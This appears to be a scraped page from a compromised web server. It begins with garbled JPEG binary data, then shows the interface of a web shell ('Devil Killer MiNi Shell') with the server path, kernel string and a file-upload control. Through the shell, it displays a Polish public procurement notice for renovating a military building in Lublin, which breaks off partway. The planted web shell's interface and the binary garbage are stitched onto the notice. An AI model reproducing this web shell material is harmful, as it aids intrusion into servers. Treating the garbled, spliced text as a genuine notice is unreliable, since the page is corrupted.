JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250711/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250711/0032036601-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Roboty budowlane polegające na remoncie pomieszczeń budynku nr 4 w kompleksie wojskowym w m. Lublin </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Rejonowy Zarząd Infrastruktury w Lublinie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 430268824</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Lipowa 1A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lublin</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">20-020</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL814 - Lubelski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">rzilublin.zampub@ron.mil.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://rzilublin.wp.mil.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Jednostka Organizacyjna MON </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Infrastuktura </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Roboty budowlane polegające na remoncie pomieszczeń budynku nr 4 w kompleksie wojskowym w m. Lublin </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-3ecdd7db-c15a-4f53-bb45-77bb7b76f578</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00320366</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-07-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00095292/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.3 Roboty budowlane polegające na remoncie pomieszczeń w budynku nr 4 przy ul. Lipowej 3 w kompleksie wojskowym w m. Lublin</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-3ecdd7db-c15a-4f53-bb45-77bb7b76f578 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.3.) Informacje na temat sposobu udostępnienia zastrzeżonych dokumentów zamówienia</h3> Szczegółowy zakres robót budowlanych (Szczegółowy Opis Przedmiotu Zamówienia/Umowy (dalej: SOPZ/U) jest zawarty w:<br/>− Dokumentacji Projektowej,<br/>− Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych,<br/>− Przedmiarze robót- POMOCNICZO;<br/>SPOSÓB UDOSTĘPNIENIA SZCZEGÓŁOWEGO OPISU PRZEDMIOTU ZAMÓWIENIA/UMOWY ZAWIERAJĄCEGO INFORMACJE JAWNE WRAŻLIWE<br/>Zamawiający informuje, że SOPZ/U stanowi materiał wrażliwy, w związku z czym Zamawiający nie może udostępnić, wskazanych w pkt III ppkt 8 SWZ, załączników na stronie internetowej.<br/>Wykonawca może uzyskać od Zamawiającego przedmiotowe SOPZ/U na etapie przygotowania oferty, na pisemny wniosek złożony do Zamawiającego na adres e-mail podany do korespondencji. We wniosku Wykonawca winien wskazać adres <br/>pocztowy, na który Zamawiający, po rozpatrzeniu wniosku prześle SOPZ/U na płycie CD/DVD.<br/>We wniosku o udostępnienie SOPZ/U, Wykonawca złoży Zamawiającemu oświadczenie o zobowiązaniu do:<br/>1) niepublikowania, nierozpowszechniania otrzymanych dokumentów, nieudostępniania jej innym podmiotom oraz do nieprzetwarzania jej w zakresie zmiany formy otrzymanej dokumentacji z elektronicznej na papierową;<br/>2) trwałego usunięcia otrzymanych dokumentów ze wszystkich nośników elektronicznych nie później niż w terminie do 14 dni od dnia publikacji na stronie internetowej Zamawiającego informacji o rozstrzygnięciu/ unieważnieniu postępowania;<br/>3) zwrotu za pismem przewodnim płyty z dokumentacją jawną zawierającą informacje wrażliwe nie później niż w terminie do 14 dni od dnia publikacji na stronie internetowej Zamawiającego informacji o rozstrzygnięciu/ unieważnieniu postępowania.<br/>W przeciwnym wypadku, wniosek pozostanie bez rozpatrzenia.<br/>Wzór wniosku o udostępnienie SOPZ/U zawiera załącznik nr 11 do SWZ. <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między Wykonawcami, a Zamawiającym odbywa się wyłącznie przy<br/>użyciu środków komunikacji elektronicznej, tj.:<br/>a) W zakresie złożenia oferty oraz oświadczeń lub dokumentów składanych wraz<br/>z ofertą – przy użyciu platformy e-Zamówienia https://ezamowienia.gov.pl<br/>UWAGA<br/>Platforma e-Zamówienia służy wyłącznie do złożenia, wycofania lub zmiany<br/>oferty wraz z załącznikami.<br/>Złożenie oferty wraz z załącznikami na nośniku danych (np. CD, pendrive) jest<br/>niedopuszczalne, nie stanowi bowiem jego złożenia przy użyciu środków<br/>komunikacji elektronicznej w rozumieniu przepisów „ustawy o świadczeniu<br/>usług drogą elektroniczną”.<br/>b) W pozostałym zakresie, w szczególności: składania oświadczeń, wniosków<br/>zawiadomień oraz przekazywania informacji – przy użyciu poczty elektronicznej<br/>Zamawiającego, wskazanej w dokumentach postępowania (str. 1 SWZ)</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów<br/>elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz informacji<br/>przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania<br/>z platformy e-Zamówienia, Instrukcji Interaktywnej platformy e-Zamówienia.<br/>Przedmiotowa instrukcja, regulamin dostępne są na stronie:<br/>https://ezamówienia.gov.pl.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Postanowienia dotyczące RODO zawarte są w SWZ i we wzorze umowy- załącznik do SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Postanowienia dotyczące RODO zawarte są w SWZ i we wzorze umowy- załącznik do SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">5.015/25/TP1/WEN</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakres Przedmiotu zamówienia obejmuje wykonanie remontu pomieszczeń budynku w szczególności:<br/>− wykonanie wymiany okien z PCV na nowe o konstrukcji z PCV spełniających obecnie obowiązujące przepisy w zakresie ochrony cieplnej budynku – okna w zbliżeniu do budynku sąsiedniego Lipowa 5 (ściana z otworami) do wymiany na okna o odporności ogniowej EI60, zgodnie z częścią graficzną,<br/>− wykonanie demontażu drzwi wewnętrznych i montaż nowych drzwi,<br/>− montaż drzwi na klatkę schodową – drzwi o odporności ogniowej EI30 i o klasie dymoszczelności S200, <br/>− wykonanie rozbiórek wskazanych w części graficznej ścian działowych ceglanych oraz kartonowo-gipsowych,<br/>− budowę nowych ścian działowych ceglanych i kartonowo-gipsowych zgodnie z częścią graficzną opracowania,<br/>− wykonanie wydzielenia pomieszczenia serwerowni – ściany gr. 25 cm murowane z cegły, montaż drzwi o odporności na włamanie w klasie RC4,<br/>− wykonanie docieplenia ścian zewnętrznych od strony wewnętrznej, zgodnie z częścią graficzną opracowania,<br/>− remont węzłów sanitarnych,<br/>− rozbiórkę i wykonanie nowych warstw posadzkowych i izolacyjnych na istniejących stropach,<br/>− remont i uzupełnienie tynków oraz wykonanie robót malarskich na istniejących ścianach,<br/>− wykonanie tynków i robót malarskich na projektowanych ściankach działowych,<br/>− montaż sufitów podwieszanych (modułowych, kasetonowych) w ciągach komunikacyjnych i pomieszczeniach sanitarnych, <br/>− wyrównanie (likwidacja) stopnia na spoczniku międzykondygnacyjnym (pomiędzy I i II piętrem), poprzez korektę biegu schodowego prowadzącego z poziomu I piętra na poziom spocznika (okna na poziomie spocznika do wymiany <br/>ze zmniejszoną wysokością),<br/>− od poziomu I piętra wymiana balustrady schodów i zmiana sposobu ich mocowania - wykonanie poszerzenia szerokości użytkowej biegów oraz spoczników pomiędzy I i II oraz II i III piętrem,<br/>− wykonanie wpięć i przepięć do kanałów wentylacji grawitacyjnej, zgodnie z częścią graficzną opracowania,<br/>− wymiana klapy wyłazowej na stropodach budynku, wykonanie uszczelnień i napraw w obrębie otworu,<br/>− wykonanie robót instalacyjnych branży sanitarnej i elektrycznej,<br/>− zabezpieczenie odcinków ściany płytami ogniochronnymi,<br/>− w miejscach oddzielenia przeciwpożarowego względem obiektu sąsiedniego wymiana wskazanych okien na okna o odporności ogniowej EI60,<br/>− likwidacja stopnia na spoczniku pomiędzy I piętrem i II piętrem,<br/>− wykonanie poszerzenia szerokości użytkowej spoczników pomiędzy I i II oraz II i III piętrem poprzez wymianę balustrad i zmianę sposobu ich mocowania,<br/>− wykonanie poszerzenia szerokości użytkowej spocznika pomiędzy I i II piętrem poprzez podkucie nadproża,<br/>− wykonanie awaryjnego oświetlenia ewakuacyjnego w ciągach korytarzowych.<br/>− Opracowanie Instrukcji Bezpieczeństwa pożarowego dla budynku<br/>Szczegółowy zakres robót budowlanych (Szczegółowy Opis Przedmiotu Zamówienia/Umowy (dalej: SOPZ/U-materiał jawny wrażliwy udostępniany na wniosek zgodnie z pkt.III ppkt 9 SWZ) jest zawarty w:<br/>− Dokumentacji Projektowej,<br/>− Specyfikacji Technicznej Wykonania i Odbioru Robót Budowlanych,<br/>− Przedmiarze robót- POMOCNICZO; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45453000-7 - Roboty remontowe i renowacyjne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-11-28</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający wybierze ofertę najkorzystniejszą na podstawie poniższych kryteriów oceny ofert:<br/>Kryterium Waga<br/>Cena oferty 60%<br/>Okres gwarancji 40%<br/>2. Oferty będą oceniane w systemie punktowym. Za najkorzystniejszą uznana zostanie<br/>oferta, która uzyska największą liczbę punktów wyliczonych wg wzoru:<br/>P = Pc + Pg<br/>gdzie:<br/>P – suma punktów przyznana ofercie,<br/>Pc – liczba punktów przyznana ofercie w kryterium – cena<br/>Pg – liczba punktów przyznana ofercie w kryterium – okres gwarancji<br/>a) Liczba punktów w kryterium – CENA OFERTY zostanie obliczona wg poniższego<br/>wzoru:<br/>Cmin<br/>Pc= ( ----------- x 100p ) x 60%<br/>Ci<br/>gdzie:<br/>Pc – liczba punktów przyznana ofercie w kryterium - cena,<br/>Cmin– cena brutto oferty z najniższą ceną,<br/>Ci– cena brutto oferty ocenianej.<br/>Maksymalną ilość przyznanych (obliczonych) punktów za kryterium cena, wynoszącą 60<br/>otrzyma oferta o najniższej cenie. Pozostałe oferty zostaną przeliczone wg powyższego wzoru.<br/>b) Liczba punktów w kryterium – OKRES GWARANCJI:<br/>24 miesiące- 0 pkt<br/>36 miesięcy- 50 pkt<br/>48 miesięcy- 100 pkt<br/>i zostanie obliczony według wzoru:<br/>Pg = (przyznana ofercie liczba punktów) * 40%<br/>gdzie:<br/>Pg – liczba punktów przyznana ofercie w kryterium – OKRES GWARANCJI<br/>a. najdłuższy okres udzielenia gwarancji na przedmiot zamówienia wynosi 48 miesięcy<br/>liczony od dnia odbioru końcowego robót budowlanych, a najkrótszy – 24 miesiące,<br/>b. maksymalna ilość punktów w kryterium „Okres gwarancji” wyniesie 40 pkt;<br/>c. Wykonawca w ofercie określi okres gwarancji na przedmiot zamówienia,<br/>d. maksymalną liczbę 40 punktów z uwzględnieniem wagi otrzyma Wykonawca, który<br/>określił długość okresu gwarancji: 48 miesięcy,<br/>e. 0 punktów otrzyma Wykonawca, który określił długość okresu gwarancji: 24 miesięcy,<br/>f. Zamawiający nie dopuszcza innych niż ww. okresy gwarancji dla przedmiotu<br/>zamówienia,<br/>g. w przypadku niewskazania w ofercie okresu gwarancji dla przedmiotu zamówienia lub<br/>wskazania krótszego okresu niż 24 miesięcy, Zamawiający odrzuci ofertę na podstawie<br/>art. 226 ust. 1 pkt 5) ustawy Pzp,<br/>h. W przypadku podania okresu dłuższego niż 48 miesięcy, Zamawiający do obliczeń<br/>przyjmie okres 48 miesięcy.<br/>3. Zamawiający wybierze spośród złożonych ofert ofertę, która przedstawi najkorzystniejszy bilans ww. kryteriów, liczony według powyższej oceny ofert<br/>(z dokładnością do dwóch miejsc po przecinku).</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1) Zdolność do występowania w obrocie gospodarczym:<br/>Warunek ten zostanie spełniony, jeżeli Wykonawca wykonujący działalność gospodarczą lub zawodową wykaże, że posiada wpis do jednego z rejestrów zawodowych lub handlowych prowadzonych w kraju, w którym ma siedzibę lub miejsce zamieszkania. <br/>2) Zdolność techniczna lub zawodowa:<br/>Warunek zostanie spełniony, jeżeli:<br/>A. Wykonawca wykaże, że w okresie ostatnich pięciu (5) lat przed upływem terminu <br/>składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – to w tym okresie wykonał: <br/>a) co najmniej jedną (1) robotę budowlaną polegającą na wykonaniu remontu budynku <br/>o powierzchni użytkowej minimum 400 m2<br/>B. skieruje do realizacji zamówienia publicznego:<br/>a) co najmniej jedną (1) osobę posiadającą uprawnienia budowlane do pełnienia samodzielnych funkcji technicznych w budownictwie w zakresie kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej – uprawnienia bez ograniczeń,<br/>zgodnie z art. 14 ust. 1. „ustawy Pb” oraz „rozporządzeniem MIiR” w sprawie funkcji technicznych w budownictwie.<br/>Wymagana jest przynależność kierownika robót budowlanych do właściwej izby samorządu zawodowego.<br/>b) co najmniej jedną (1) osobę posiadającą aktualne zaświadczenie kwalifikacyjne uprawniające do zajmowania się eksploatacją urządzeń, instalacji i sieci elektrycznych na stanowisku: „DOZORU”, Grupa 1 – „D1”;<br/>c) co najmniej jedną (1) osobę posiadającą aktualne zaświadczenie kwalifikacyjne uprawniające do zajmowania się eksploatacją urządzeń, instalacji i sieci elektrycznych na stanowisku: „EKSPLOATACJI”, Grupa 1 – „E1” <br/>Ocena spełniania ww. warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą „spełnia – nie spełnia” w oparciu o informacje zawarte w dokumentach i oświadczeniach wyszczególnionych w punkcie XVIII. SWZ.<br/>Zasady spełniania warunków udziału w postępowaniu w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia opisane są w pkt XXIV. SWZ. Postanowienia w zakresie polegania na zdolnościach podmiotów udostępniających <br/>zasoby opisane są w pkt XX. SWZ. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.OŚWIADCZENIE Wykonawcy o aktualności informacji zawartych w Oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp w zakresie podstaw wykluczenia z postepowania wskazanych przez Zamawiającego oraz podstaw wykluczenia zgodnie z art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz <br/>służących ochronie bezpieczeństwa narodowego - według wzoru załączonego do SWZ.<br/>2. W przypadku Wykonawcy wobec którego wydano prawomocny wyrok sądu lub ostateczną decyzję administracyjną o zaleganiu z uiszczeniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne, Wykonawca złoży:<br/>−dowód potwierdzający, że Wykonawca przed upływem terminu składania ofert dokonał płatności należnych podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w<br/>sprawie spłaty tych należności.<br/>3. W przypadku, gdy należąc do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, Wykonawcy złożyli odrębne oferty, Wykonawca złoży:<br/>− dowód potwierdzający, że Wykonawcy przygotowali te oferty niezależnie od siebie.<br/>4. Gdy w przypadkach, o których mowa w art. 85 ust. 1, doszło do zakłócenia konkurencji, wynikającego z wcześniejszego zaangażowania tego Wykonawcy lub <br/>podmiotu, który należy z Wykonawcą do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, <br/>Wykonawca złoży:<br/>−dowód potwierdzający, że spowodowane tym zakłócenie konkurencji może być wyeliminowane w inny sposób niż przez wykluczenie Wykonawcy z udziału <br/>w postępowaniu o udzielenie zamówienia.<br/>5. W przypadku Wykonawcy, który naruszył obowiązki dotyczące płatności podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne z wyjątkiem przypadku, o którym mowa w art. 108 ust. 1 pkt 3:<br/>−dowód, potwierdzający iż Wykonawca przed upływem terminu do składania ofert dokonał płatności należnych podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w <br/>sprawie spłaty tych należności;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Dokument potwierdzający, że Wykonawca wykonujący działalność <br/>gospodarczą lub zawodową jest wpisany do jednego z rejestrów <br/>zawodowych lub handlowych, prowadzonych w kraju, w którym ma <br/>siedzibę lub miejsce zamieszkania, wystawiony nie wcześniej niż 6 miesięcy od dnia złożenia;<br/>2. WYKAZ ROBÓT BUDOWLANYCH, wykonanych nie wcześniej niż w okresie ostatnich pięciu (5) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te <br/>zostały wykonane – według wzoru załączonego do SWZ;<br/>Obowiązek wskazania przez Wykonawcę w Wykazie robót budowlanych dotyczy robót, o których mowa w pkt XVII ppkt. 2.4 lit. A SWZ.<br/>3. DOWODY dotyczące wykonanych robót 